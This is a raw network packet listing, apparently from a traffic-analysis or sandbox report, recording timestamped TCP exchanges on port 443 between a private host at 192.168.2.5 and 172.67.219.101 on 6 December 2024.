Dec 6, 2024 15:25:43.543278933 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.543319941 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.543353081 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.543360949 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.543380022 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.543395042 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.558661938 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.558693886 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.558789015 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.558815002 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.558851004 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.571327925 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.571357965 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.571414948 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.571440935 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.571470022 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.571485043 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.577967882 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.578002930 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.578110933 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.578110933 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.578123093 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.581681967 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.585427999 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.585455894 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.585561991 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.585561991 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.585588932 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.587430000 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.587461948 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.587481022 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.587506056 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.587521076 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.587541103 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.587568998 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.587568998 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.587575912 CET	443	49704	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:43.587599993 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:43.590274096 CET	49704	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:45.045903921 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:45.045952082 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:45.046021938 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:45.056818962 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:45.056839943 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.276015043 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.276165009 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:46.277869940 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:46.277879000 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.278192043 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.284348011 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:46.327337027 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.987791061 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.987832069 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.987888098 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:46.987904072 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.988730907 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.988778114 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:46.988782883 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.990792990 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.990843058 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:46.990848064 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.996243954 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:46.996295929 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:46.996304035 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.004884958 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.004935980 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.004941940 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.057015896 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.057049036 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.103830099 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.187026024 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.190834999 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.190978050 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.191004992 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.199134111 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.199233055 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.199250937 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.207230091 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.207329988 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.207355976 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.216130972 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.216377020 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.216403008 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.224775076 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.224895000 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.224912882 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.239527941 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.239644051 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.239655972 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.247296095 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.247405052 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.247412920 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.253895044 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.253985882 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.254000902 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.261111021 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.261178970 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.261184931 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.306987047 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.307012081 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.353877068 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.379216909 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.382344007 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.382436991 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.382450104 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.388725996 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.388814926 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.388838053 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.394181013 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.394259930 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.394284010 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.398768902 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.398835897 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.398844957 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.408425093 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.408514023 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.408530951 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.408574104 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.413496017 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.413507938 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.413588047 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.418297052 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.418368101 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.428041935 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.428055048 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.428128958 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.437706947 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.437720060 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.437798977 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.447418928 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.447508097 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.452429056 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.452538013 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.573427916 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.573580980 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.581279993 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.581392050 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.586427927 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.586514950 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.593101978 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.593188047 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.597057104 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.597165108 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.604971886 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.605057001 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.612597942 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.612683058 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.620220900 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.620294094 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.624290943 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.624362946 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.632119894 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.632237911 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.639708996 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.639794111 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.643764019 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.643840075 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.651505947 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.651586056 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.659207106 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.659271955 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.663419008 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.663541079 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.671454906 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.671538115 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.678611040 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.678700924 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.686424971 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.686512947 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.692886114 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.692966938 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.763264894 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.763384104 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.767638922 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.767746925 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.774302006 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.774463892 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.777808905 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.777898073 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.784075975 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.784169912 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.789922953 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.790028095 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.795782089 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.795876980 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.798691988 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.798773050 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.804155111 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.804244041 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.807235003 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.807317972 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.812249899 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.812334061 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.817276001 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.817364931 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.822514057 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.822607040 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.825138092 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.825217009 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.837888002 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.837902069 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.837945938 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.837987900 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.838006973 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.838023901 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.854729891 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.854756117 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.854919910 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.854938984 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.872188091 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.872212887 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.872256041 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.872272015 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.872308016 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.889924049 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.889955044 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.890127897 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.890161037 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.932043076 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.956804037 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.956820011 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.956881046 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.956927061 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.956940889 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.956989050 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.969336033 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.969372034 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.969475031 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.969492912 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.969537020 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.979428053 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.979463100 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.979554892 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.979585886 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.979639053 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.990868092 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.990895987 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.990984917 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:47.990994930 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:47.991039038 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.001301050 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.001334906 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.001462936 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.001472950 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.001512051 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.011106014 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.011137962 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.011225939 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.011234045 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.011281013 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.019547939 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.019577980 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.019650936 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.019659042 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.019696951 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.026446104 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.026474953 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.026551962 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.026561022 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.026573896 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.026595116 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.154280901 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.154311895 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.154347897 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.154362917 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.154403925 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.159324884 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.159356117 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.159404039 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.159419060 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.159454107 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.159466982 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.165136099 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.165162086 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.165209055 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.165224075 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.165247917 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.165265083 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.171088934 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.171113014 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.171164989 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.171180964 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.171216011 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.171227932 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.176142931 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.176170111 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.176214933 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.176229000 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.176259041 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.176273108 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.182091951 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.182118893 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.182176113 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.182189941 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.182238102 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.187431097 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.187454939 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.187501907 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.187515020 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.187544107 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.187563896 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.193207026 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.193238020 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.193320036 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.193320036 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.193337917 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.193377972 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.194616079 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.194669962 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.347963095 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.347995996 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.348038912 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.348054886 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.348067045 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.348093033 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.353152037 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.353171110 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.353219986 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.353226900 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.353262901 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.353281021 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.355875969 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.355943918 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.355951071 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.357724905 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.357779026 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.357784033 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.357835054 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.363236904 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.363255978 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.363301039 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.363321066 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.363343000 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.363360882 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.368410110 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.368432999 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.368473053 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.368483067 CET	443	49707	172.67.219.101	192.168.2.5
Dec 6, 2024 15:25:48.368510962 CET	49707	443	192.168.2.5	172.67.219.101
Dec 6, 2024 15:25:48.368529081 CET	49707	443	192.168.2.5	172.67.219.101
